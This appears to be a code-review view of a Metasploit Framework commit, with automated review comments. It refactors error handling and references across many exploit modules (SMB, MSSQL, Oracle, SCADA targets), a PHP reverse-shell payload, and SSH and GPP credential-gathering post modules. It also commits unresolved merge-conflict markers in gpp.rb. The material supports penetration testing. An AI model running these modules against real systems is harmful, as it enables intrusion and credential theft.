+eax=0e5eb6a0 ebx=00000000 ecx=00000183 edx=00000003 esi=0e5eb091 edi=00130000
+eip=10ceaa7a esp=0012ee5c ebp=0012ee64 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+iTunes_10000000!iTunesMainEntryPoint+0xb93f3a:
+10ceaa7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+0:000> k
+ChildEBP RetAddr
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012ee64 10356284 iTunes_10000000!iTunesMainEntryPoint+0xb93f3a
+0012eea4 1035657c iTunes_10000000!iTunesMainEntryPoint+0x1ff744
+0012eed8 1034de49 iTunes_10000000!iTunesMainEntryPoint+0x1ffa3c
+00000000 00000000 iTunes_10000000!iTunesMainEntryPoint+0x1f7309
+0:000> !address esi
+ 0c720000 : 0d87d000 - 00ea3000
+ Type 00020000 MEM_PRIVATE
+ Protect 00000004 PAGE_READWRITE
+ State 00001000 MEM_COMMIT
+ Usage RegionUsageHeap
+ Handle 0c720000
+0:000> !address edi-10
+ 00030000 : 000ee000 - 00042000
+ Type 00020000 MEM_PRIVATE
+ Protect 00000004 PAGE_READWRITE
+ State 00001000 MEM_COMMIT
+ Usage RegionUsageStack
+ Pid.Tid d1c.d0c
+=end
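Review bot: In `on_request_uri`, the guard `return if ((p = regenerate_payload(cli).encoded) == nil)` calls `.encoded` before the nil test, so if `regenerate_payload` can return nil (as the guard assumes) the line raises NoMethodError instead of returning. The test belongs on the payload object, `return if ((p = regenerate_payload(cli)) == nil)`, with `p.encoded` handed to `generate_m3u`. The local name `p` also shadows `Kernel#p`. The payload is regenerated for every request, including the `.ico` requests that are answered with `send_not_found`; moving the call into the `.m3u` branch would avoid that work.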
diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb
index 3daab88dab..3655e0a479 100644
--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2009-5109'],
[ 'OSVDB', '61341' ],
[ 'EDB', 10745 ],
],
diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb
index 71935dba57..c9f8a72391 100644
--- a/modules/exploits/windows/misc/mirc_privmsg_server.rb
+++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-4449' ],
[ 'OSVDB', '48752' ],
[ 'BID', '31552' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/6666' ],
+ [ 'EDB', '6666' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb
index 73cbf2fd20..c24e4fa002 100644
--- a/modules/exploits/windows/misc/netcat110_nt.rb
+++ b/modules/exploits/windows/misc/netcat110_nt.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-1317' ],
[ 'OSVDB', '12612' ],
[ 'BID', '12106' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/726' ],
+ [ 'EDB', '726' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb
index 7c6038a6fe..3e180ad102 100644
--- a/modules/exploits/windows/misc/sap_2005_license.rb
+++ b/modules/exploits/windows/misc/sap_2005_license.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '56837' ],
[ 'CVE', '2009-4988' ],
[ 'BID', '35933' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
+ [ 'EDB', '9319' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb
index 211677b975..0ac469682d 100644
--- a/modules/exploits/windows/misc/stream_down_bof.rb
+++ b/modules/exploits/windows/misc/stream_down_bof.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'StreamDown 6.8.0 Buffer Overflow',
+ 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
@@ -23,6 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Fady Mohamed Osman ',
'References' =>
[
+ ['CVE', '2011-5052'],
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb
index a72788f2dc..6779dbded2 100644
--- a/modules/exploits/windows/misc/talkative_response.rb
+++ b/modules/exploits/windows/misc/talkative_response.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '64582'],
[ 'BID', '34141' ],
- [ 'URL', 'http://milw0rm.com/exploits/8227' ],
+ [ 'EDB', '8227' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
index da5817d9d4..332719052b 100644
--- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
+++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
def make_tcpmsghdr(data)
len = data.length
# The server doesn't like packets that are bigger...
- raise RuntimeError, 'Length too big' if (len > 0x1000)
+ fail_with(Exploit::Failure::BadConfig, 'Message length is too big') if (len > 0x1000)
len /= 8
# Pack the pieces in ...
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
index 8d03bda5f6..e9b25ababe 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5416' ],
[ 'BID', '32710' ],
[ 'MSB', 'MS09-004' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7501' ]
+ [ 'EDB', '7501' ]
],
'DefaultOptions' =>
{
@@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting automatic target detection...")
version = mssql_query_version
- raise RuntimeError, "Unable to get version!" if not version
+ fail_with(Exploit::Failure::NoAccess, "Unable to retrieve version information") if not version
if (version =~ /8\.00\.194/)
mytarget = targets[1]
@@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if mytarget.nil?
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to determine target")
else
print_status("Automatically detected target \"#{mytarget.name}\"")
end
@@ -385,7 +385,7 @@ exec sp_executesql @z|
# go!
if (not mssql_login_datastore)
- raise RuntimeError, "Unable to log in!"
+ fail_with(Exploit::Failure::NoAccess, "Unable to log in!")
end
begin
mssql_query(runme, datastore['VERBOSE'])
@@ -460,7 +460,7 @@ exec sp_executesql @z|
end
if (not logged_in)
- raise RuntimeError, "Invalid SQL Server credentials"
+ fail_with(Exploit::Failure::NoAccess, "Invalid SQL Server credentials")
end
res = mssql_query("select @@version", datastore['VERBOSE'])
disconnect
@@ -471,7 +471,7 @@ exec sp_executesql @z|
res[:errors].each do |err|
errstr << err
end
- raise RuntimeError, errstr
+ fail_with(Exploit::Failure::Unknown, errstr)
end
if not res[:rows] or res[:rows].empty?
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
index 350ba90f27..4ee4950ae1 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5416' ],
[ 'BID', '32710' ],
[ 'MSB', 'MS09-004' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7501' ],
+ [ 'EDB', '7501' ],
[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/' ]
],
'DefaultOptions' =>
@@ -289,7 +289,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting automatic target detection...")
version = mssql_query_version
- raise RuntimeError, "Unable to get version!" if not version
+ fail_with(Exploit::Failure::NoAccess, "Unable to get version!") if not version
if (version =~ /8\.00\.194/)
mytarget = targets[1]
@@ -310,7 +310,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if mytarget.nil?
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
else
print_status("Automatically detected target \"#{mytarget.name}\"")
end
diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb
index ffc7432326..423ce99944 100644
--- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb
+++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
version = tns_version
if (not version)
- raise RuntimeError, "Unable to detect the Oracle version!"
+ fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
end
print_status("Oracle version reply: " + version)
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
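Review bot: Inside `check`, `fail_with` raises instead of returning a check code, so a caller that expects a `CheckCode` gets an exception when `tns_version` returns nothing. Returning a code keeps the method's contract: `print_error("Unable to detect the Oracle version!")` followed by `return Exploit::CheckCode::Unknown`. The body of `check` continues past the end of this hunk.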
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = tns_version
if (not version)
- raise RuntimeError, "Unable to detect the Oracle version!"
+ fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
end
if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
end
print_status("Automatically detected target \"#{mytarget.name}\"")
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = sock.get_once(-1, 1)
rescue ::Errno::ECONNRESET, EOFError
- raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..."
+ fail_with(Exploit::Failure::Unknown, "OOPS, maybe the service hasn't started completely yet, try again...")
end
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
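Review bot: `Exploit::Failure::Unknown` discards what this `rescue` already knows: the branch is reached only on `::Errno::ECONNRESET` or `EOFError`, which is what `Exploit::Failure::Disconnected` names. The @@ -236 hunk has a similar mismatch, using `Failure::NoTarget` for a message that says the host may be patched; `Exploit::Failure::NotVulnerable` or `UnexpectedReply` describes that case, while `NoTarget` is used elsewhere in this commit for target auto-detection. Suggested here: `fail_with(Exploit::Failure::Disconnected, "OOPS, maybe the service hasn't started completely yet, try again...")`. The enclosing method starts and ends outside both hunks.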
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
# expecting disconnect...
if (res = sock.get_once(-1, 1))
print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
- raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/"
+ fail_with(Exploit::Failure::NoTarget, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/")
end
handler
diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
index 1b8f62d878..7977fa9a92 100644
--- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
+++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666' ],
- [ 'URL', 'http://milw0rm.com/exploits/621' ],
+ [ 'EDB', '621' ],
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb
index 4a2fcfad0d..6323c9d99d 100644
--- a/modules/exploits/windows/scada/codesys_web_server.rb
+++ b/modules/exploits/windows/scada/codesys_web_server.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2011-5007'],
[ 'OSVDB', '77387'],
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
[ 'EDB', 18187 ],
diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
index 35d5ec3f9b..98f5f3bac5 100644
--- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
+++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
@@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2011-2089'],
['OSVDB', '72135'],
['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],
['EDB', 17240],
diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb
index 3daf20b4f2..ebbbc4fa69 100644
--- a/modules/exploits/windows/scada/igss9_misc.rb
+++ b/modules/exploits/windows/scada/igss9_misc.rb
@@ -36,6 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2011-1565'],
+ [ 'CVE', '2011-1566'],
[ 'OSVDB', '72354'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.altervista.org/adv/igss_1-adv.txt' ], #Write File packet flaw
diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb
index df3af42a45..9c0f54a7b8 100644
--- a/modules/exploits/windows/scada/moxa_mdmtool.rb
+++ b/modules/exploits/windows/scada/moxa_mdmtool.rb
@@ -29,20 +29,21 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
- [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ],
+ [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
- 'InitialAutoRunScript' => 'migrate -f',
+ 'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
- 'StackAdjustment' => -3500,
+ 'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
index 99dbd51718..92ea664d25 100644
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- #[ 'CVE', '?'],
+ [ 'CVE', '2011-3497'],
[ 'OSVDB', '75490'],
[ 'BID', '49613'],
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb
index 3817185659..66661b4c2d 100644
--- a/modules/exploits/windows/scada/winlog_runtime_2.rb
+++ b/modules/exploits/windows/scada/winlog_runtime_2.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14',
+ 'Name' => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16',
'Description' => %q{
- This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.14.
+ This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.
When sending a specially formatted packet to the Runtime.exe service on port 46824,
an attacker may be able to execute arbitrary code.
},
@@ -29,7 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'BID', '53811'],
- [ 'URL', 'http://www.s3cur1ty.de' ],
+ [ 'OSVDB', '82654'],
+ [ 'EDB', '18986'],
+ [ 'URL', 'http://www.s3cur1ty.de/m1adv2012-001' ],
[ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]
],
'DefaultOptions' =>
@@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
- [ 'Sielco Sistemi Winlog 2.07.14 - Ceramics Kiln Project',
+ [ 'Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project',
{
'Ret' => 0x405153df,
'Offset' => 167,
diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
index ed446f0463..2fbc86ecba 100644
--- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb
+++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
@@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Detected a Windows XP SP0/SP1 target")
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
if (e.error_code == 0xc0000022)
- raise RuntimeError, "Windows XP SP2 requires Administrator privileges!"
+ fail_with(Exploit::Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")
end
print_status("Detected a Windows XP target (unknown patch level)")
end
mytarget = targets[2]
else
- raise RuntimeError, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}..."
+ fail_with(Exploit::Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
end
else
mytarget = target
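Review bot: The first added `fail_with` reports `Exploit::Failure::Unknown` even though the branch is guarded by `e.error_code == 0xc0000022`, which is the access-denied status, and the message itself says administrator privileges are required. The cause is known here, so `fail_with(Exploit::Failure::NoAccess, "Windows XP SP2 requires Administrator privileges!")` would classify it correctly. The second call's use of `NoTarget` looks right. The enclosing method begins and ends outside this hunk.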
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index 0fca26511b..6f31d6bd3e 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -790,7 +790,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Bail early on unknown OS
if(fprint['os'] == 'Unknown')
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
# Windows 2000 is mostly universal
@@ -845,7 +845,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if(not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -1174,7 +1174,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
module_base + rvas[e]
elsif e == :unused
diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb
index 5d5752359f..44e1d94079 100644
--- a/modules/exploits/windows/smb/ms10_061_spoolss.rb
+++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Open the printer
status,ph = open_printer_ex(pname)
if status != 0
- raise RuntimeError, "Unable to open printer: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}")
end
print_status("Printer handle: %s" % ph.unpack('H*'))
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
# ClosePrinter
status,ph = close_printer(ph)
if status != 0
- raise RuntimeError, "Failed to close printer: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}")
end
break if session_created?
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError
- raise RuntimeError, $!.message
+ fail_with(Exploit::Failure::Unknown, $!.message)
end
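Review bot: The rescue clause in this hunk still reads the exception through the global `$!` and maps both an SMB error code and a `Rex::ConnectionError` to `Failure::Unknown`. Binding the exception and separating the connection case keeps the reason meaningful: `rescue Rex::ConnectionError => e` with `fail_with(Exploit::Failure::Unreachable, e.message)`, and `rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e` with `fail_with(Exploit::Failure::Unknown, e.message)`. The method this rescue belongs to starts outside the hunk.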
@@ -194,21 +194,21 @@ class Metasploit3 < Msf::Exploit::Remote
# StartDocPrinter
status,jobid = start_doc_printer(ph, doc, fname)
if status != 0 or jobid < 0
- raise RuntimeError, "Unable to start print job: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}")
end
print_status("Job started: 0x%x" % jobid)
# WritePrinter
status,wrote = write_printer(ph, data)
if status != 0 or wrote != data.length
- raise RuntimeError, ('Failed to write %d bytes!' % data.length)
+ fail_with(Exploit::Failure::Unknown, ('Failed to write %d bytes!' % data.length))
end
print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname])
# EndDocPrinter
status = end_doc_printer(ph)
if status != 0
- raise RuntimeError, "Failed to end print job: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Failed to end print job: #{Msf::WindowsError.description(status)}")
end
end
diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
index cfbf6bbdad..cfd7f1cc08 100644
--- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
+++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '11535' ],
- [ 'URL', 'http://milw0rm.com/exploits/598' ],
+ [ 'EDB', '598' ],
],
'Platform' => ['win'],
'Arch' => [ ARCH_X86 ],
diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
index ae6e2a2118..95151dce66 100644
--- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
+++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '8838' ],
[ 'OSVDB', '2674' ],
[ 'MSB', 'MS03-046' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/113' ],
+ [ 'EDB', '113' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb
index b7b8da687e..28178c019c 100644
--- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb
+++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '76728' ],
- #[ 'CVE', '' ],
+ [ 'CVE', '2011-4040' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'EDB', 18057 ]
],
diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
index 0ab998578b..51a6ba6641 100644
--- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
+++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-4948' ],
[ 'OSVDB', '29032' ],
[ 'BID', '20131' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3132' ],
+ [ 'EDB', '3132' ],
],
'DefaultOptions' =>
{
diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb
index 01cb95f8b7..e280df2c13 100644
--- a/modules/payloads/singles/php/reverse_php.rb
+++ b/modules/payloads/singles/php/reverse_php.rb
@@ -69,7 +69,7 @@ module Metasploit3
end
shell=<<-END_OF_PHP_CODE
- $ipaddr=#{ipaddr};
+ $ipaddr='#{ipaddr}';
$port=#{port};
#{php_preamble({:disabled_varname => "$dis"})}
diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb
index a1e78f670a..acfda0743d 100644
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -40,7 +40,8 @@ class Metasploit3 < Msf::Post
def run
print_status("Finding .ssh directories")
paths = enum_user_directories.map {|d| d + "/.ssh"}
- paths.select! { |d| directory?(d) }
+ # Array#select! is only in 1.9
+ paths = paths.select { |d| directory?(d) }
if paths.nil? or paths.empty?
print_error("No users found with a .ssh directory")
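Review bot: After the switch to the non-destructive `select`, the `paths.nil?` half of the following condition can no longer be true, because `select` always returns an array. The check can be reduced to `if paths.empty?`. The map and filter could also be written as one chain, `paths = enum_user_directories.map { |d| d + "/.ssh" }.select { |d| directory?(d) }`, which removes the reassignment the new comment has to explain. The rest of `run` lies outside this hunk.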
diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb
index c120f3d5e6..919727ddc3 100644
--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -8,10 +8,18 @@
require 'msf/core'
require 'rex'
require 'rexml/document'
+<<<<<<< HEAD
+=======
+require 'msf/core/post/windows/registry'
+>>>>>>> upstream/master
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::Windows::Priv
+<<<<<<< HEAD
+=======
+ include Msf::Post::Windows::Registry
+>>>>>>> upstream/master
def initialize(info={})
super( update_info( info,
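Review bot: Unresolved merge-conflict markers are being committed as added lines in this hunk (`+<<<<<<< HEAD`, `+=======`, `+>>>>>>> upstream/master` around the `require` and the `include`). The same pattern repeats in every later hunk of gpp.rb, through to the end of the file. With the markers in place the file is not valid Ruby and holds both sides of each conflicting method, so the module cannot load. The conflict should be resolved to one side before merging; from the markers this looks like keeping the `upstream/master` side (`require 'msf/core/post/windows/registry'`, `include Msf::Post::Windows::Registry`, `gpp_xml_file`/`parse_xml`) and dropping the `HEAD` side, but that needs confirming with the authors.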
@@ -22,6 +30,7 @@ class Metasploit3 < Msf::Post
files containing local user accounts and passwords and decrypts them
using Microsofts public AES key.
+<<<<<<< HEAD
Users can specify DOMAINS="domain1 domain2 domain3 etc" to target specific
domains on the network. This module will enumerate any domain controllers for
those domains.
@@ -35,13 +44,21 @@ class Metasploit3 < Msf::Post
Using the ALL or DOMAINS flags whilst on a DC will not enumerate that DC as it
is looking externally on the network for other Domain Controllers, however the
default (CURRENT=True which inspects the registry) should work successfully.
+=======
+ Tested on WinXP SP3 Client and Win2k8 R2 DC.
+>>>>>>> upstream/master
},
'License' => MSF_LICENSE,
'Author' =>[
'Ben Campbell ',
'Loic Jaquemet ',
'scriptmonkey ',
+<<<<<<< HEAD
'TheLightCosine '
+=======
+ 'TheLightCosine ',
+ 'Rob Fuller ' #domain/dc enumeration code
+>>>>>>> upstream/master
],
'References' =>
[
@@ -54,6 +71,7 @@ class Metasploit3 < Msf::Post
'SessionTypes' => [ 'meterpreter' ]
))
+<<<<<<< HEAD
register_options(
[
OptBool.new('CURRENT', [ false, 'Enumerate current machine domain.', true]),
@@ -190,6 +208,113 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ register_options([
+ OptBool.new('ALL', [ false, 'Enumerate all domains on network.', true]),
+ OptString.new('DOMAINS', [false, 'Enumerate list of space seperated domains DOMAINS="dom1 dom2".'])], self.class)
+ end
+
+ def run
+
+ group_path = "MACHINE\\Preferences\\Groups\\Groups.xml"
+ group_path_user = "USER\\Preferences\\Groups\\Groups.xml"
+ service_path = "MACHINE\\Preferences\\Services\\Services.xml"
+ printer_path = "USER\\Preferences\\Printers\\Printers.xml"
+ drive_path = "USER\\Preferences\\Drives\\Drives.xml"
+ datasource_path = "MACHINE\\Preferences\\Datasources\\DataSources.xml"
+ datasource_path_user = "USER\\Preferences\\Datasources\\DataSources.xml"
